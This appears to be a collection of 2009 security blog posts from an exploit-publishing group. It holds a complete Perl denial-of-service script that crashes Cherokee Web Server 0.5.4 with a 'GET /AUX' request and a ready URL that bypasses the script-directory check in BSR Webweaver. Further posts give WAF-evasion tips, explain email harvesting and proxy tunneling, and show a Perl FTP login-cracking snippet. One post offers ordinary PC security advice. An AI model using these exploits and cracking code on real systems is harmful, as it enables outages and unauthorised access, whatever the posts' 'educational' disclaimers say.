Cherokee Web Server 0.5.4 Denial Of Service

#######################################################
#
# Name : Cherokee Web Server 0.5.4 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website:  Xc0re.net
# DATE: 25/10/09
# Tested on Windows !
#######################################################

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

[*] Download Page : http://www.cherokee-project.com/download/windows/

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes !

[*] Exploitation :

#!/usr/bin/perl
# Cherokee Web Server 0.5.4 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [25/10/09]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = “AUX”;

$stuff = “GET /”.$packet.” HTTP/1.1\r\n” .
“User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n” .
“Host:127.0.0.1\r\n”.
“Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n”.
“Accept-Language: en-US,en;q=0.9\r\n”.
“Accept-Charset: iso-8859-1,*,utf-8\r\n”.
“Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n”;

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

exit;
}

$sock = IO::Socket::INET->new( Proto => “tcp”,PeerAddr => $host , PeerPort => $PORT) || die “Cant connect to $host!”;
print “+========================================================+\n”;
print “+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [25/10/09] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n";
print "+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

print “\n”;

print “[*] Initializing\n”;

sleep(2);

print “[*] Sendin DOS Packet \n”;

send ($sock , $stuff , 0);
print “[*] Crashed \n”;
$res = recv($sock,$response,1024,0);
print $response;

exit;

BSR Webweaver 1.33 /script security Bypass vulnerability

BSR Webweaver 1.33

Author : Usman Saeed , Exploit @ Xc0re Security Research Group.

[*] Date: 15/09/09

[*] http://www.brswebweaver.com/downloads.html

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : In ISAPI/CGI path is [%installdirectory%/scripts] and through HTTP the alias is [http://[host]/scripts] ,The access security check is that if the attacker tries to access /scripts a 404 Error response occurs ! Now to bypass and check the directory listing [That is if Directory Browsing is allowed in the server Configuration !] just copy and paste the exploit url !.
This is the reason this exploit is not called a Directory Listing Exploit !

[*] Exploitation :

[+] http://[host]/scripts/%bg%ae%bg%ae/.exe

Kolibri+ Webserver 2 Multiple Vulnerabilities

Kolibri+ Webserver 2 suffers from multiple vulnerabilities namely Directory Traversal &  Denial OF Service. Vulnerability was reported on 6th of September 2009 by Xc0re Security Research Group.

http://xc0re.net/index.php?p=1_19_Kolibri+-Webserver-2-multiple-vulnerabilities

An attacker can easily crash the server , or send a crafted http request to escape the root directory and view any file , even outside the root directory.

Web Application firewall bypass !

Web Application security is very important nowadays ! especially due to ecommerce. Hence Web Application firewalls came into being ! which automatically filter out the malicious query string. And many high end technology giants have them installed !

But what IF ???!!!

Some one bypasses the WAF (Web Application Firewalls) , and because of the WAF, the programmers dont give much thought to filer or properly sanitize the input ! And once by passed  then its all good for the attacker !

Detecting WAF !

WAFs can easily be detected by the response one gets in the http request ! For instance some WAFs give off wierd response codes ! such as 901 ! Some give  40x  errors even thought he file exists !  Some drop the packets through FIN/RST ! so if the response is analysed one can easily determine whether the firewall is there or not or of which vendor it belongs to !

Bypassing WAF !

• Encoding the input into hex or Unicode !
• One can split their input strings using & and can easily bypass the WAF ! (esp the attack used for Modsecurity WAF)
• Even WAF have vulnerabilities such as XSS ! Thus can be easily by passed !

To conclude one can say that due to the premade rules of the WAFs it becomes predictable and very easy to bypass !

Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities

Hello ! recently i found a vulnerability in Cisco Subscriber Edge Services Manager which enables the attacker to exploit the XSS and HTML Injection bug ! Details can be checked on Xc0re
I think all the versions are affected !

Email Id leak in email servers !

Actually servers as illustrated in the above picture some times leak email ids which help spammers to pin point an email address to spam ! As seen above  xt3m3@<target host.com> didnt work because it didnt exist and the server gave a message user unknown ! Attempts are made until a legit email isnt discovered thus the server giving a reply Recipent Ok .

This not a serious threat  but then again once emails are attained then sending trojans , worms and virus is a normal practice ! But mostly it is used for Spamming !

if { web applications } then {system intrusion}

Now ! a days every one hears about ASP , PHP or Asp.net.

These frameworks have enabled programmers to make dynamic websites. Well web applications can be a heaven for some but a disaster for others .

Let me directly cut to the chase . Well for instance  you encounter a website www[.]dummy[.]org  which runs ASP. The Dummy.org’s server is guarded by a very sophisticated firewall. you find a script login.asp which has fields username and password ! You some how hack into it [For details about how to bypass core firewall and webapplication attacks visit Xc0re Knowledge Core ] and see that the login interface has a full control over the server and the website , you do nothing just log out !

Now after that who needs to hackinto the box , download a rootkit and try to hackin without authentication !

Peace !

How tunneling softwares compromise internal security

First off let me  explain what tunneling really is ? Well to make it simple i wont go into technical details but would say that for example you take a LAYS chips packet and put some thing  in side it , that you are usually not allowed to send and you seal it back and send it through  mail. Now the mail check post will check that its a Lays Chips packet and forward it and when it reaches your frnd ,he just unwraps it and gets the other wise forbidden object.

Now a little technical stuff ! Usually what local tunneling softwares use is HTTPs tunneling . that is , HTTPS is used as the Lays Chips packet and the data you want to tunnel is inside the https wrapped  packet.

Usually the network design is such that before the gateway firewall there is usually a proxy server. And in a firewall policy table a proxy has more rights then the normal employee. That is it is allowed to access the internet with full rights and access any remote port where as a normal employee has to go through the proxy to access the internet and for him/her there are further checks at the proxy . for example

A) Employee —-(direct external nw access not allowed)—-> X [Firewall]  X

B) Employee —– > [Proxy] ——- > [Firewall] ===>(Allowed)

In case of (B) the proxy has checks on orkut.com , youtube.com etc… so the employee cant access these websites. And Msn messenger / Yahoo messenger are blocked by the firewall.

Now that was the scenario. Now i will tell you people how it can be bypassed easily:

You download a software for instance   . It has a live server which it connects to using HTTPS or port 443 ! and you can even give the Proxy ip address that you are using. Now its so simple it sends the packet to the proxy that it wants to connect to port 443 of the live server now the innocent proxy server forwards the request to that server through the firewall thus once connected , one can send any data out by just feeding it to hopster!

Usually in softwares like msn messenger ,  yahoo messenger etc ask you to give local proxy address and you just have to give your local hosts ip address or 127.0.0.1 and the software’s port number and you are good to go !

Solution:

The Network Administrator  should install such softwares to check the remote servers they connect to and block the ips on the proxy and at the firewall end. And usually there is one server with single live ip address so once blocked it cannot connect.

Five hardcoded rules for System Security

I always watch people complaining that their data got currupted or they had a virus attack and they had to reinstall windows ! Well thats because people usually naive and innocent and the guy in the picture takes advantage of that innocence.

Well today ill tell you five hardcoded rules that when

you get your windows installed or you install it your self , you should follow the rules.

1. After installing your windows , install an antivirus immediately. [People usually tell me that they dont run an AV (Antivirus) because it slows down their system. Well i will give a solution for this problem later near the end].
2. Once the AV is up and running and is updated , install a personal firewall.
3. Once the firewall is installed be sure to check if the Windows autoupdater is enabled.
4. Now follow me : goto My computer . When the window opens goto the tools menu –> Folder options then when the folder options window opens goto the VIEW tab and under the hidden file & folder option , check show hidden files & folders then uncheck the hide extensions for known filetypes option.
5. Install An AntiSpyware ! normally it comes with the package of an AV but i prefer a standalone Antispyware program.

Well if one follows these rules and sticks to them , he/she wont need to reinstall the windows ,every time a virus comes.

Now referring to the problems:

• If the AV is heavy on your PC install a light weight AV . A very good example is AVAST AV
• Personal Firewalls , well pne of my favourite is ZoneAlarm

Well thats all ! hope every ones safe !

Writing a Simple Ftp cracker with perl.

Well PERL is a scripting language with the help of which one can make alot of good stuff ! Today ill show you how to create a simple ftp cracker !

DISCLAIMER: Every thing mentioned in this blog/post is for educational puposes. And I would not be held responsible for any illegal use of the material by any one .

Full version of the code is here

First off we include  NET::FTP:

use Net::FTP;

now what we will do is , create an ftp socket !

$ftp = Net::FTP->new($IPaddress, Timeout => 5);

where the IP address is the Ip address of the target system and 5 is the timeout to try out the next connection attempt.

Now we just have to add the code to check for username and password.

if($ftp->login(“ftp”,”ftp”)) {
$bogus = “CRACKED Username : ftp password: ftp “;

print “$bogus \n”;

}
In the abve code snippet the script checks against username = ftp  and password = ftp ! and if its attempt is a success itllgive a message :

CRACKED Username : ftp password: ftp !

Well one can hard code the username and passwords as i have done or get them from a file !

Peace !